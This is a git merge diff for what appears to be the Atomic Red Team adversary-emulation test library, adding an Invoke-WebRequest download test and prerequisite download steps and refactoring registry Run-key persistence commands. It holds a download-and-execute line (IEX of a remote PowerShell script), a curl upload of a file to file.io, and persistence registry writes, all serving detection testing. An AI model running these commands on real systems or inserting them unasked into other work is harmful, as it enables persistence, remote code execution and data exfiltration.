Merge branch 'master' into 2080

2022-10-08 19:01:19 +01:00
parent 457687dc9b 90212b5fa4
commit 14298afc74
20 changed files with 292 additions and 39 deletions
@@ -1326,6 +1326,7 @@ command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,27,Linux Download File and Run,bdc373c5-e9cf-4563-8a7b-a9ba720a90f3,sh
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
 command-and-control,T1090.001,Proxy: Internal Proxy,1,Connection Proxy,0ac21132-4485-4212-a681-349e8a6637cd,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,2,Connection Proxy for macOS UI,648d68c1-8bcd-4486-9abe-71c6655b6a2c,sh
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
@@ -965,6 +965,7 @@ command-and-control,T1105,Ingress Tool Transfer,24,Lolbas replace.exe use to cop
 command-and-control,T1105,Ingress Tool Transfer,25,certreq download,6fdaae87-c05b-42f8-842e-991a74e8376b,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,26,Download a file using wscript,97116a3f-efac-4b26-8336-b9cb18c45188,command_prompt
 command-and-control,T1105,Ingress Tool Transfer,28,Nimgrab - Transfer Files,b1729c57-9384-4d1c-9b99-9b220afb384e,command_prompt
+command-and-control,T1105,Ingress Tool Transfer,29,iwr or Invoke Web-Request download,c01cad7f-7a4c-49df-985e-b190dcf6a279,command_prompt
 command-and-control,T1090.001,Proxy: Internal Proxy,3,portproxy reg key,b8223ea9-4be2-44a6-b50a-9657a3d4e72a,powershell
 impact,T1489,Service Stop,1,Windows - Stop service using Service Controller,21dfb440-830d-4c86-a3e5-2a491d5a8d04,command_prompt
 impact,T1489,Service Stop,2,Windows - Stop service using net.exe,41274289-ec9c-4213-bea4-e43c4aa57954,command_prompt
@@ -2168,6 +2168,7 @@
  - Atomic Test #26: Download a file using wscript [windows]
  - Atomic Test #27: Linux Download File and Run [linux]
  - Atomic Test #28: Nimgrab - Transfer Files [windows]
+  - Atomic Test #29: iwr or Invoke Web-Request download [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
@@ -1577,6 +1577,7 @@
  - Atomic Test #25: certreq download [windows]
  - Atomic Test #26: Download a file using wscript [windows]
  - Atomic Test #28: Nimgrab - Transfer Files [windows]
+  - Atomic Test #29: iwr or Invoke Web-Request download [windows]
 - T1001.002 Steganography [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1008 Fallback Channels [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1090.001 Proxy: Internal Proxy](../../T1090.001/T1090.001.md)
@@ -7078,6 +7078,11 @@ defense-evasion:
        is required.
      supported_platforms:
      - windows
+      input_arguments:
+        txt_path:
+          description: Path to file containing VBA macro to run
+          type: Path
+          default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
      dependency_executor_name: powershell
      dependencies:
      - description: 'The 64-bit version of Microsoft Office must be installed
@@ -7094,11 +7099,18 @@ defense-evasion:
          manually to meet this requirement"

          '
+      - description: "#{txt_path} must exist on disk at specified location\n"
+        prereq_command: 'if (Test-Path #{txt_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{txt_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}"
      executor:
        command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+          Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
        name: powershell
    - name: Remote Process Injection in LSASS via mimikatz
      auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
@@ -13952,6 +13964,15 @@ defense-evasion:
          description: Output Binary
          type: Path
          default: PathToAtomicsFolder\T1055.004\bin\T1055.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{exe_binary} must be exist on system.\n"
+        prereq_command: 'if (Test-Path #{exe_binary}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.004/bin/T1055.exe" -OutFile "#{exe_binary}"
      executor:
        command: "#{exe_binary}\n"
        name: command_prompt
@@ -31143,6 +31164,11 @@ privilege-escalation:
        is required.
      supported_platforms:
      - windows
+      input_arguments:
+        txt_path:
+          description: Path to file containing VBA macro to run
+          type: Path
+          default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
      dependency_executor_name: powershell
      dependencies:
      - description: 'The 64-bit version of Microsoft Office must be installed
@@ -31159,11 +31185,18 @@ privilege-escalation:
          manually to meet this requirement"

          '
+      - description: "#{txt_path} must exist on disk at specified location\n"
+        prereq_command: 'if (Test-Path #{txt_path}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{txt_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}"
      executor:
        command: |
          [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
          IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-          Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+          Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
        name: powershell
    - name: Remote Process Injection in LSASS via mimikatz
      auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
@@ -34380,6 +34413,15 @@ privilege-escalation:
          description: Output Binary
          type: Path
          default: PathToAtomicsFolder\T1055.004\bin\T1055.exe
+      dependency_executor_name: powershell
+      dependencies:
+      - description: "#{exe_binary} must be exist on system.\n"
+        prereq_command: 'if (Test-Path #{exe_binary}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.004/bin/T1055.exe" -OutFile "#{exe_binary}"
      executor:
        command: "#{exe_binary}\n"
        name: command_prompt
@@ -36446,12 +36488,11 @@ privilege-escalation:
          type: String
          default: C:\Windows\System32\calc.exe
      executor:
-        command: try {if($(get-item -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run").PSChildName
-          -eq "Run"){Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType
-          Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run";
-          Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}
+        command: |
+          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+          }
+          Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
        cleanup_command: Remove-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          -Name "#{target_key_value_name}"
        name: powershell
@@ -36472,12 +36513,11 @@ privilege-escalation:
          type: String
          default: C:\Windows\System32\calc.exe
      executor:
-        command: try {if($(get-item -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -ErrorAction Stop).PSChildName -eq "Run"){Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType
-          Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run";
-          Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}
+        command: |
+          if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+            New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+          }
+          Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
        cleanup_command: Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          -Name "#{target_key_value_name}"
        name: powershell
@@ -58400,12 +58440,11 @@ persistence:
          type: String
          default: C:\Windows\System32\calc.exe
      executor:
-        command: try {if($(get-item -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run").PSChildName
-          -eq "Run"){Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType
-          Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run";
-          Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}
+        command: |
+          if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+            New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+          }
+          Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
        cleanup_command: Remove-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          -Name "#{target_key_value_name}"
        name: powershell
@@ -58426,12 +58465,11 @@ persistence:
          type: String
          default: C:\Windows\System32\calc.exe
      executor:
-        command: try {if($(get-item -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -ErrorAction Stop).PSChildName -eq "Run"){Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType
-          Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run";
-          Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
-          -Name "#{target_key_value_name}" -Value "#{payload}"}
+        command: |
+          if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+            New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+          }
+          Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
        cleanup_command: Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
          -Name "#{target_key_value_name}"
        name: powershell
@@ -83816,6 +83854,18 @@ discovery:
          description: Path to sample script
          type: String
          default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Sample script file must exist on disk at specified location
+          (#{vbscript})
+
+          '
+        prereq_command: 'if (Test-Path #{vbscript}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
      executor:
        command: 'cscript #{vbscript}'
        name: powershell
@@ -94016,6 +94066,32 @@ command-and-control:
          Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
          Remove-Item $env:temp\nim
          Remove-Item $env:temp\nim.zip
+    - name: iwr or Invoke Web-Request download
+      auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
+      description: 'Use ''iwr'' or "Invoke-WebRequest" -URI argument to download a
+        file from the web. Note: without -URI also works in some versions.
+
+        '
+      supported_platforms:
+      - windows
+      input_arguments:
+        remote_file:
+          description: URL of file to copy
+          type: Url
+          default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+        local_path:
+          description: Local path to place file
+          type: Path
+          default: "%temp%\\Atomic-license.txt"
+      executor:
+        command: 'powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
+
+          '
+        cleanup_command: 'del %temp%\Atomic-license.txt >nul 2>&1
+
+          '
+        name: command_prompt
+        elevation_required: true
  T1001.002:
    technique:
      x_mitre_platforms:
@@ -101620,6 +101696,13 @@ exfiltration:
          Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
          Remove-Item $env:temp\curl
          Remove-Item $env:temp\curl.zip
+      - description: "#{input_file} must be exist on system.\n"
+        prereq_command: 'if (Test-Path #{input_file}) {exit 0} else {exit 1}
+
+          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "#{input_file}"
      executor:
        name: command_prompt
        elevation_required: false
@@ -101641,8 +101724,10 @@ exfiltration:
      executor:
        name: bash
        elevation_required: false
-        command: curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true'
+        command: 'curl -F ''file=@#{input_file}'' -F ''maxDownloads=1'' -F ''autoDelete=true''
          https://file.io/
+
+          '
  T1041:
    technique:
      x_mitre_platforms:
@@ -58,6 +58,16 @@ Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System3
 Remove-Item $env:temp\curl
 Remove-Item $env:temp\curl.zip
 ```
+##### Description: #{input_file} must be exist on system.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{input_file}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "#{input_file}"
+```



@@ -28,6 +28,13 @@ atomic_tests:
      Copy-Item $env:temp\curl\curl-7.79.1-win64-mingw\bin\curl.exe C:\Windows\System32\Curl.exe
      Remove-Item $env:temp\curl
      Remove-Item $env:temp\curl.zip
+  - description: |
+      #{input_file} must be exist on system.
+    prereq_command: |
+      if (Test-Path #{input_file}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1048.002/src/artifact" -OutFile "#{input_file}"
  executor:
    name: command_prompt
    elevation_required: false
@@ -49,4 +56,4 @@ atomic_tests:
    name: bash
    elevation_required: false
    command: |
-      curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
+      curl -F 'file=@#{input_file}' -F 'maxDownloads=1' -F 'autoDelete=true' https://file.io/
@@ -51,6 +51,19 @@ Upon successful execution, cmd.exe will execute T1055.exe, which exercises 5 tec



+#### Dependencies:  Run with `powershell`!
+##### Description: #{exe_binary} must be exist on system.
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{exe_binary}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.004/bin/T1055.exe" -OutFile "#{exe_binary}"
+```
+
+


 <br/>
@@ -20,6 +20,15 @@ atomic_tests:
      description: Output Binary
      type: Path
      default: PathToAtomicsFolder\T1055.004\bin\T1055.exe
+  dependency_executor_name: powershell 
+  dependencies:   
+  - description: |
+      #{exe_binary} must be exist on system.
+    prereq_command: |
+      if (Test-Path #{exe_binary}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{exe_binary}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055.004/bin/T1055.exe" -OutFile "#{exe_binary}"
  executor:
    command: |
      #{exe_binary}
@@ -31,6 +31,11 @@ is required.



+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| txt_path | Path to file containing VBA macro to run | Path | PathToAtomicsFolder&#92;T1055&#92;src&#92;x64&#92;T1055-macrocode.txt|
+

 #### Attack Commands: Run with `powershell`! 

@@ -38,7 +43,7 @@ is required.
 ```powershell
 [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
 IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
 ```


@@ -59,6 +64,16 @@ try {
 ```powershell
 Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
 ```
+##### Description: #{txt_path} must exist on disk at specified location
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{txt_path}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{txt_path}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}"
+```



@@ -11,6 +11,11 @@ atomic_tests:
    is required.
  supported_platforms:
  - windows
+  input_arguments:
+    txt_path:
+      description: Path to file containing VBA macro to run
+      type: Path
+      default: PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt
  dependency_executor_name: powershell
  dependencies:
  - description: |
@@ -24,11 +29,18 @@ atomic_tests:
      } catch { exit 1 }
    get_prereq_command: |
      Write-Host "You will need to install Microsoft Word (64-bit) manually to meet this requirement"
+  - description: |
+      #{txt_path} must exist on disk at specified location
+    prereq_command: |
+      if (Test-Path #{txt_path}) {exit 0} else {exit 1}
+    get_prereq_command: |
+      New-Item -Type Directory (split-path #{txt_path}) -ErrorAction ignore | Out-Null
+      Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1055/src/x64/T1055-macrocode.txt" -OutFile "#{txt_path}"
  executor:
    command: |
      [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
      IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing)
-      Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute"
+      Invoke-Maldoc -macroFile "#{txt_path}" -officeProduct "Word" -sub "Execute"
    name: powershell
 - name: Remote Process Injection in LSASS via mimikatz
  auto_generated_guid: 3203ad24-168e-4bec-be36-f79b13ef8a83
@@ -340,6 +340,19 @@ cscript #{vbscript}



+#### Dependencies:  Run with `powershell`!
+##### Description: Sample script file must exist on disk at specified location (#{vbscript})
+##### Check Prereq Commands:
+```powershell
+if (Test-Path #{vbscript}) {exit 0} else {exit 1}
+```
+##### Get Prereq Commands:
+```powershell
+New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null
+Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
+```
+
+


 <br/>
@@ -121,6 +121,15 @@ atomic_tests:
      description: Path to sample script
      type: String
      default: PathToAtomicsFolder\T1082\src\griffon_recon.vbs
+  dependency_executor_name: powershell
+  dependencies:
+    - description: |
+       Sample script file must exist on disk at specified location (#{vbscript})
+      prereq_command: |
+        if (Test-Path #{vbscript}) {exit 0} else {exit 1}
+      get_prereq_command: |
+        New-Item -Type Directory (split-path #{vbscript}) -ErrorAction ignore | Out-Null
+        Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1082/src/griffon_recon.vbs" -OutFile "#{vbscript}"
  executor:
    command: 'cscript #{vbscript}'
    name: powershell
@@ -335,4 +344,4 @@ atomic_tests:
    command: |
      sudo lsmod
      sudo kmod list
-    name: sh
+    name: sh
@@ -64,6 +64,8 @@ On Windows, adversaries may use various utilities to download tools, such as `co

 - [Atomic Test #28 - Nimgrab - Transfer Files](#atomic-test-28---nimgrab---transfer-files)

+- [Atomic Test #29 - iwr or Invoke Web-Request download](#atomic-test-29---iwr-or-invoke-web-request-download)
+

 <br/>

@@ -1265,4 +1267,42 @@ Remove-Item $env:temp\nim.zip



+<br/>
+<br/>
+
+## Atomic Test #29 - iwr or Invoke Web-Request download
+Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** c01cad7f-7a4c-49df-985e-b190dcf6a279
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| remote_file | URL of file to copy | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt|
+| local_path | Local path to place file | Path | %temp%&#92;Atomic-license.txt|
+
+
+#### Attack Commands: Run with `command_prompt`!  Elevation Required (e.g. root or admin) 
+
+
+```cmd
+powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
+```
+
+#### Cleanup Commands:
+```cmd
+del %temp%\Atomic-license.txt >nul 2>&1
+```
+
+
+
+
+
 <br/>
@@ -769,4 +769,25 @@ atomic_tests:
        Copy-Item $env:temp\nim\nim-1.6.6\bin\nimgrab.exe #{local_nimgrab}
        Remove-Item $env:temp\nim
        Remove-Item $env:temp\nim.zip
-
+- name: iwr or Invoke Web-Request download  
+  auto_generated_guid: c01cad7f-7a4c-49df-985e-b190dcf6a279
+  description: |  
+    Use 'iwr' or "Invoke-WebRequest" -URI argument to download a file from the web. Note: without -URI also works in some versions.
+  supported_platforms:
+  - windows
+  input_arguments:
+    remote_file:
+      description: URL of file to copy
+      type: Url
+      default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt
+    local_path:
+      description: Local path to place file
+      type: Path
+      default: '%temp%\Atomic-license.txt'
+  executor:
+    command: |
+      powershell.exe iwr -URI #{remote_file} -Outfile #{local_path}
+    cleanup_command: |
+      del %temp%\Atomic-license.txt >nul 2>&1
+    name: command_prompt
+    elevation_required: true
@@ -526,7 +526,10 @@ This test will create a new value under HKEY_CURRENT_USER\Software\Microsoft\Win


 ```powershell
-try {if($(get-item -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run").PSChildName -eq "Run"){Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"; Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}
+if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+  New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+}
+Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
 ```

 #### Cleanup Commands:
@@ -565,7 +568,10 @@ This test will create a HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVer


 ```powershell
-try {if($(get-item -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -ErrorAction Stop).PSChildName -eq "Run"){Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"; Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}
+if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+  New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+}
+Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
 ```

 #### Cleanup Commands:
@@ -247,7 +247,11 @@ atomic_tests:
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
-    command: try {if($(get-item -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run").PSChildName -eq "Run"){Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"; Set-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}
+    command: |
+      if (!(Test-Path -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+        New-Item -ItemType Key -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+      }
+      Set-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
    cleanup_command: Remove-ItemProperty -Path  "HKCU:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
    name: powershell
    elevation_required: true
@@ -269,11 +273,15 @@ atomic_tests:
      type: String
      default: C:\Windows\System32\calc.exe
  executor:
-    command: try {if($(get-item -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -ErrorAction Stop).PSChildName -eq "Run"){Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}} catch {New-Item -ItemType Key -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"; Set-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"}
+    command: |
+      if (!(Test-Path -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run")){
+        New-Item -ItemType Key -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run"
+      }
+      Set-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}" -Value "#{payload}"
    cleanup_command: Remove-ItemProperty -Path  "HKLM:\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" -Name "#{target_key_value_name}"
    name: powershell
    elevation_required: true
-    
+
 - name: HKLM - Append Command to Winlogon Userinit KEY Value
  auto_generated_guid: f7fab6cc-8ece-4ca7-a0f1-30a22fccd374
  description: | 
@@ -1157,3 +1157,4 @@ f7fab6cc-8ece-4ca7-a0f1-30a22fccd374
 1d958c61-09c6-4d9e-b26b-4130314e520e
 1d0d9aa6-6111-4f89-927b-53e8afae7f94
 42e51815-a6cc-4c75-b970-3f0ff54b610e
